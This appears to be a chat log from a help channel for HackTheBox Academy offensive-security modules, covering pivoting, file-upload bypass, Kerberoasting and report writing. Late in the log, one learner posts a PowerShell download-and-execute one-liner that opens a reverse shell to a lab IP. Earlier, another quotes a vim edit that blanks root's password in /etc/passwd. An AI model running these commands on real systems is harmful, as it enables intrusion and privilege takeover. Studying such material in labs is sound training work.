you needed to create a second pivot for proxychains to tunnel to to reach the subnet

you never did a second tunnel from b back to a to actually connect thechain

I thought that's what the proxychains xfreerdp command does

I suggest you study some more networking fundamentals.

your first pivot host cannot reach the second subnet, trying pinging from there since you have ssh

no why would you think this

no, the proxychains commands USES the proxychains config to connect to proxied networks

So why was I able to RDP and get to the 16.6 then?

it doesn't magically create new proxies

I'm so confused!

you rdp into b yes?

yes

because you used a rdp program from the host that had access

from that host you used rdp FROM THAT MACHINE to connect to C, but you didn't actually 'proxychain' your way to C, you just used what's available on the system

this is why I said you lacked subnet fundementals and kept saying to create a map of the network and connections

but you never did did you

if you set up the chain CORRECTLY you would be able to
1; scan the right subnet
2; xfreerdp from your attackhost directly to C

without needing to go to B then rdp from B to C

MarcieLee is correct

the double pivoting module is something you should DEFINITELY revisit

because it's basically this scenario

you completed the assessment but it's clear that you don't understand the tools that you used

and networking

https://tenor.com/view/dbz-piccolo-happy-rainbow-ぴっころ-gif-5439338

I am not that great at regex, but it looks like the file has to end in a 'g'. I also see think that the regex says that the file has to be something like one of the three main image types other than gif. I did try those three but the vector graphic I have no idea how to use that other than what the module shows.

I was looking through that and realized I would not have had the ip yet without an nmap scan before I was able to connect back.

How do I connect back without knowing the 16.6 ip?

I eventually could, but that was using the ip I found by running the ping script in cmd on the 17.5.

Only jesus can help you at this point.

The module teaches it assuming you know the ip at that point

we are SO CLOSE to figuring it out

Sorry wrong screenshot

sir

i implore you to try and understand concepts

This is the portion I was looking at

you got the B IP from doing enumeration, yes?

ok so let me break down this even simpler

So are you telling me I have to configure proxifier to then proxychain nmap to find the IP and then continue?

A and B are on the same subnet, when you create a proxy with A you then have access to the networks A has

which is what allows you to connect to B

B and C are on the same subnet, but C is not on the same subnet as A, hence why you can't proxychain to it

you need to create a proxy on B to chain these resources together

So that's what they're explaining with proxifier?

yes

if you do ipconfig on A and B you'll see they have different interfaces/connections :)

and if you check C you'll notice it too

there's a reason I'm boilingit down A/B/C is to break it away from the examples using direct IP

I see where the confusion was, thank you!

It was the fact that there were three rdp sessions in the module, where I only had an SSH tunnel for A on the skills assessment.

yeah and easy one to miss if you're new to Windows! That's why I said you'd become a good Windows administrator 😉

So I didn't think that the proxifier and server portion was needed in this case since I was just going to RDP into it anyway.

@pearl torrent I'm going to scream

And on this day... nothing was achieved.

all these squares make a circle

Thank you @fathom pendant

So you did answer my question, I did not have to run the script in CMD, I could have gone through that method further to tunnel back.

The TL;DR is you can do whatever works for you. There is no definitive answer in right or wrong per se. The important take away is the core concepts... which I'm just gonna leave with that statement.

👍 Thank you. I'm glad at least I have a shortcut for the exam, but wow, I knew something was missing!

the way you did it isn't incorrect per-se but your initial question was getting it to work with proxychains

Yeah, I knew there was probably a way to do it based on the modules. I know there's a lot of instances of "do your own research" on academy, but my gut was telling me that there was something in the module. I guess the lesson I learned from this besides the on @pearl torrent mentioned is to not use the sections/modules as a procedure or methodology, but rather as guidance. I guess what I'm trying to say is I'm not going to do stuff in order necessarily next time.

this is why I spend extra time on modules: to understand the concepts behind it - not JUST "oh hey let me just copy/paste verbatim" which is super easy to get trapped into on some modules

because it really do be like that

especially if you're given a one-liner that pipes outputs to other commands

understanding that first command does A, second command takes A and does B to it, third takes B and does C...

it's why if something isn't working walking yourself backwords helps

if a piped command isn't working, find out where the leak is

spent like a good hour trying to figure something out in AD Enum and Attacks: only for it to be a command conflict with Active Directory and PowerView

Trying to fuzz it shows that /image/jpeg does not work even though I would think that the regex says that it should, right? I am still stuck. I did not get anything back from the fuzzing. Reading the php makes it seem like I am right. I am still not sure why I am still only getting the Only Images are alllowed error

the modules and sections give you tools in the toolbox and some context of when they may or may not be useful. It is ultimately your responsibility to know when to apply or even combine tools together to succeed. These tools in your toolbox might be literal tools, concepts, processes, ect.

thats what every module skill assessment has been trying to do the whole time. Test your understanding to see if you can use your toolbox effectively.

which is why I keep getting mad about copy pasting because 80% of the time thats not how you should be approaching things.

fucking with commands is how i found out hashcat had an output mode THIS WHOLE TIME

and how me and f0x discovered this was the issue with what i was doing

Yeah, I like messing around with tools and trying stuff from the man page or help.

I am still stuck on this image upload. Can I just use a regular image open it up in terminal and add the payload at the end of the text?

I assume all the servers are in Europe which I did not think about before gosh darn it I wish I swore and drink sometimes lol

why not try it and find out?

beat case scenario it works, worst case scenario you learned something:)

I did and it took me about forty minutes to think of the date or so I thought that I was doing something wrong. I could have had this done hours ago if I would have no tried to do exactly what the instructions said, tried to use the little cheat sheet, and think out of the box like I tell my family and the folks that I supervise.

I am glad no one told me the answer.

It really is a god feeling, lol.

nice, congrats

Thank you.

I am on the File Transfer Module on the Windows File Transfer page, attempting to perform the second question asked. I've uploaded the file upload_win.zip onto the windows computer, I've unzipped the file. I don't have permission to use hasher on the text file as suggested. Instead i've created a new file and copied the contents and was able to use hasher on a new file. The hash that is generated does not appear to be the answer to the question. Have I missed a step?

the game was rigged from the start

ty tho !

hasher on the linux server on the next page was able to hash the file from the windows server page correctly, the windows machine is not working correctly

RDP and SOCKS Tunneling with SocksOverRDP
I followed all the steps and the real time protection also is turned off and .ddl is loaded to reg but when i ran the server i get this error

[-] Could not open Dynamic Virtual Channel, plugin was not loaded on the client side: 31

svchost is falied : i see this message from my proxy i did as they said in the mod idk where im worng

Hello everyone, I am stuck on the very first question of the Password Attacks : Network Services Module. Question is : "Find the user for the WinRM service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer." I discovered that the 5985 port (for the winrm service) is open but the nmap -A and -sC options didn't yield anything interesting. I coudn't find any scripts for enumerating users for winrm with nmap so do I need to use crackmapexec right away even for the username or should I keep trying nmap?

Doesn’t the module provide a user and password list?

In resources

Aha you're right I didn't see that

heyo! guys im stuck in a module "attacking common services" DNS. subbrute does not find anything for inlanefreight.htb

im very confused as in module examples we started working with .htb and switched to .com ... why is that? :/

do you mind if i dm you? Im stuck on task 3 that skill assesment, tried Abusing Access to Shared Folders on ||ShareBackups(BACKUP01)|| and ||ShareSQL (SQL01)||

Of course but I can't answer till 30 min approx

Did you add the target IP into your /etc/hosts file I.e

10.129.203.6 inlanefreight.htb

yup

but axfr transfer just fails

im using subbrute, but it just breaks

im stuck :/

Hello,
I have a stupid question about Pass The hash attacks.
Is the injection of the new hash in the lsass session considered part of the pth attack in itself or is it a mandatory step before the attack itself but not part of the attack per say?
Sorry about my english

@dusk shore echo "inlanefreight.htb" > ./resolvers.txt

./subbrute inlanefreight.htb -s ./names.txt -r ./resolvers.txt

i added ip adress of attack machine as well to resolvers.txt

I have another foolish question. Does anyone else use WSL2 instead of a standard WM? I only have Kali this way, but I did find a way to install Parrot

Then try dig AXFR @inlanefreight.htb **.inlanefreight.htb

i get:
IndexError: list index out of range when using subbrute

adding ./ worked.. -.- thanks and sorry for disturbing you guys.. Thank you trev0ck! 🙂

No worries, glad you got it! 🙂

Anyone familiar with Information Gathering module? I'm stuck on Active Infrastructure Identification page

you mean INFORMATION GATHERING - WEB EDITION ?
if thats the case i found most of the answers to the the questions with Wappalyzer.

Now im the one that needs some help, im doing the AD Enumeration & Attacks - Skills Assessment Part 2 and im a bit stuck in question 8 that is to get the Admin flag in MS01, i think i need a domain user that allows me admin rights and using bloodhound i found one that is the answer for question 9 but i cant find the hash, i will appreciate some nuggets

Mimikatz

mimikatz in SQL01?? buecause i still dont have admin on MS01 so i cant run mimikatz for what i understand

Yup

got will try thanks

You can look for the path from sql01 to ms01

In the Service Scanning module in the Penetration Tester job path could anyone please help me understand where am I supposed to obtain the OID from in the first place? It's right there in the command they're running but they haven't explained where to get it from.

Can anyone help me on the first part of Linux Priv escalation in the environment enumeration module?

yes someone can help you

hi there, anyone willing to explain me or lemme know where to read about what this mean : ':%s/^root:[^:]*:/root::/\nwq' ..!!!

Chatgpt

good point, I didn't see it. thanks

hi

Has anybody troubles spawning boxes? trying to do the training lab in documentation, but the box is not willing 🙂

Web Requests
Stuck on a question:
Obtain a session cookie through a valid login, and then use the cookie with cURL to search for the flag through a JSON POST request to '/search.php'

I use the command:
curl -X POST -d '{"search":"flag"}' -H 'Content-Type: application/json' -H 'Cookie: PHPSESSID=t3jks0j77ncate6d7j0nvu9nn9' http://my --data-raw/search.php

help me please
I'm so confused that my head is spinning...

I feel like I’m walking around somewhere, but I can’t understand..

—data-raw is used for sending raw post data without any processing if you want to send json data stick with -d

Didn't understand(

For me it finally looks like this
curl -X POST -d '{"search":"flag"}' -H 'Content-Type: application/json' -H 'Cookie: PHPSESSID=t3jks0j77ncate6d7j0nvu9nn9' http://83.136.253.251:33659/search.php

remove the —data-raw flag since you’re already using -d

Tell me honestly, am I three? Or am I doing something wrong?

you’re three

Got it, I'm stupid)

😉

you are here and willing to learn 😉 all that counts.

So is this how it should look right?

curl -X POST -d '{"search":"flag"}' -H 'Content-Type: application/json' -H 'Cookie: PHPSESSID=t3jks0j77ncate6d7j0nvu9nn9' http://83.136.253.251:33659/search.php

?

yes

Yeah, that's what he writes to me (

so you need a valid cookie.

^

That's it, the train has arrived😫

😣

What kind of cookies? why cookies?
ukillmepls)

reread the question you try to solve

I’ve already done this 100 times and I just don’t understand what he wants from me. My brain is just overloaded...

hey y'all, I'm stuck with the LPE capabilities exercise, I'm doing the step-by-step described in the section with no success, any hint will be good received....

Am I going in the right direction? Or did he go to the wrong place at all?

hey i got problem with WINDOWS ATTACKS & DEFENSE Skill assesment
I get the base64 from first attack then do the rubeus one but it gives :
krb-error (16) kdc_err_padata_type_nosupp
I looked up some say its bcs its disabled

alright saw this and will try and will edit later for future errors

sory forgot to remove ping

In short, I found the answer, but can someone tell me the solution to this problem in more detail?

tried it one more time and didnt work

any mods?

#modules message See if this message helps?

never run as admin

Password attacks lab - hard is it normal that || Logins.kdbx || takes a lot of time to crack? (I'm using my local GPU with mut_list)

go through that section again

2 things; make sure you're doing the right mode, and I believe it's either in the mutated list or rockyou- most time I've spent is maybe 5-10 minutes

"https://academy.hackthebox.com/module/143/section/1274"

"Retrieve the TGS ticket for the SAPService account. Crack the ticket offline and submit the password as your answer"

I tried the commands used in that section and when I execute the command, it asked me for a username and password. The credentials are not listed in the section. Are we supposed to use the credentials for the user forend that was found in previous sections?

should be forend if I remember right, check earlier sections

Im on the active directory skills assessment. I got the reverse shell on my local box. Is it normal that my shell doesnt output anything?

I runn commands and it just doesnt run anything... theres no output on my terrminal

I used powershell #3 base64 get a reverse shell but no output for most commands.

You should be able to follow the section for the most part (aside from changing some stuff for it to get SAPService) but aside from that it's fairly doable

nevermind, Ill be fine

got OSCP exam next friday, I better be fine

How are you studying for the oscp exam

Hi
I have a question in the documentation and reporting module.

So in university our teacher told us that we should not go into details when telling ppl how to fix a vulnerability.

But in the course they go a bit in detail in some places as far as to tell someone what he should change in a configuration file.

So I am a bit confused on how I should write a good remediation,

Like let's say when u try to login they tell you if the username exists or not in the error message, so here should I tell them to change the error message in a way where I can't enumerate usernames or should I also suggest an error message

Or let's take another example, let's say I can read a file that I shouldn't, so here should I tell them that they need to remove the read privilege or should I also give them the command?

So. The point is really that you should not be making changes yourself. You can absolutely suggest fixes based on vulnerabilities- but your goal as a tester is to find and exploit vulnerabilities - there's a whole separate team that should handle vulnerability management and mitigation

Something that's common is "username and/or password is incorrect"

If it's a simple on/off config change that's different than "here's a whole command to fix it"

Ahh ok so if it's a simple config I can add it as a recommendation but what the other cases if it's a simple commande like just chmod can do it ? And for the other case can I suggest a different error message

basically suggest what should be fixed and why, but not how, you can make recommendations based on the finding, like if they use weak passwords, then they should enforce password policy/use a password manager, but don't include how to implement those

^

Reduce liability for future engagement. CYA goes hard in this industry

Yeah I get this, that's exactly what our teacher told us, but like I'm a bit confused about cases like the example I gave, for the error message should I just tell them to change in a certain way or should I give a suggestion ( the entire is about the suggestion part is it ok or not )

Give suggestion to change it

Don't be specific in how to fix it

So a recommendation like this is ok ?

Change the error message in a way where an attacker cannot enumerate usernames, u could for example use this error message " the provided credentials do not match our records "

something like "do not reveal user information through error messages" is enough, how they want to word it is their choice

Using "for example " stuff reaches into recommending what to do

is that supposed to be 'whoami'?

Ok I get it thank you so much @fathom pendant and @next bronze

Friends, i'm about an hours trying something but it's not going very well

Probably a formatting thing with your light mode extension

i tried adding it to host, nslookup and a bunch of shit

it's a screenshot from LInux Bible pdf

Remove screenshot, it reveals info

oh, my bad

okay I am really stuck. So Im on active directory skills assessment 1 question 2. Ive found couple users. I want to start running a few tools, but my terminal is not at all showing output. except for like system commands or so

Look at available ports on the target

25 is not open

That's not the point of what I said

Lol

Look at the ports available for the system

try this credentials in others services?

Yes

give me a sec

Im trying to run Inveigh for example. No output.

Anyone, I have a problem with machine Devvortex. Just I`m trying to nmap it, but output says, that host is down.

This isn't the place for active boxes

#boxes

ok

then you need to fix your shell

This channel is for help with academy modules

yea I figured there must be something wrong with my shell.

don't see what tho, is powershell#3 not good enough?

use something like Invoke-PowerShellTcp, should be in the module

hello guys doing the skill assessement for reporting module and just wanna know what they mean by this complete the in-progress penetration test. Once you achieve Domain Admin level access, submit the contents of the flag.txt file on the Administrator Desktop on the DC01 host.

it's exactly what it means, own the domain then get the flag

the in progresse

The report you're given is "in-progress"

Meaning you're tasked with completing it

^ read the section, you're given a scenario

my bad

XD

did you figure it out?

Yes, thank you!

I'm actually asking for help spent way too long on this, dm?

Sure

hmm that doesnt work

I do get other shells. But for some reason none is interactive

Im trying this

powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.198:1337/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.198 -Port 1234

aaah it worked

No, it doesn't My shell is still not showing any output. Im running inveigh.exe annd its just blank screen on execute

am I missing something>

ah inveigh.exe has interactive mode which needs user input to stop, powershelltcp doesn't show the output until the program has finished

check if it saved the hashes to a log file in CWD

IT DID, okay Ima let it run for a couple minutes and come back to it. Though this now works. It doesnt fix the rest. mimikatz for example also doesnt show output

'What powerful local group on the Domain Controller is the SAPService user a member of? '

https://academy.hackthebox.com/module/143/section/1274

So I would have to use one of the tools from the previous sections to find the local group? I tried the net command and that seemed to not be recognized(despite following the command format)

$net user SAPService /domain
Invalid command: net rap user SAPService
Usage:
net rap user add Add specified user
net rap user info List domain groups of specified user
net rap user delete Remove specified user

mimikatz is also in interactive mode, you can set it to run and exit
.\mimikatz.exe "privilege::debug" "<command here>" "<more commands>" "exit"
also useful for use in evil-winrm

You know when you use GetUserSPNs there is a column of "memberOf" yeah?
Also thats weird its seeing your net user command as "net rap" maybe a typo?

It suggest that 'rap' be in the command when using it .

apologies just noticed you are looking for "localgroup"?

are you running that command prompt command in a linux shell?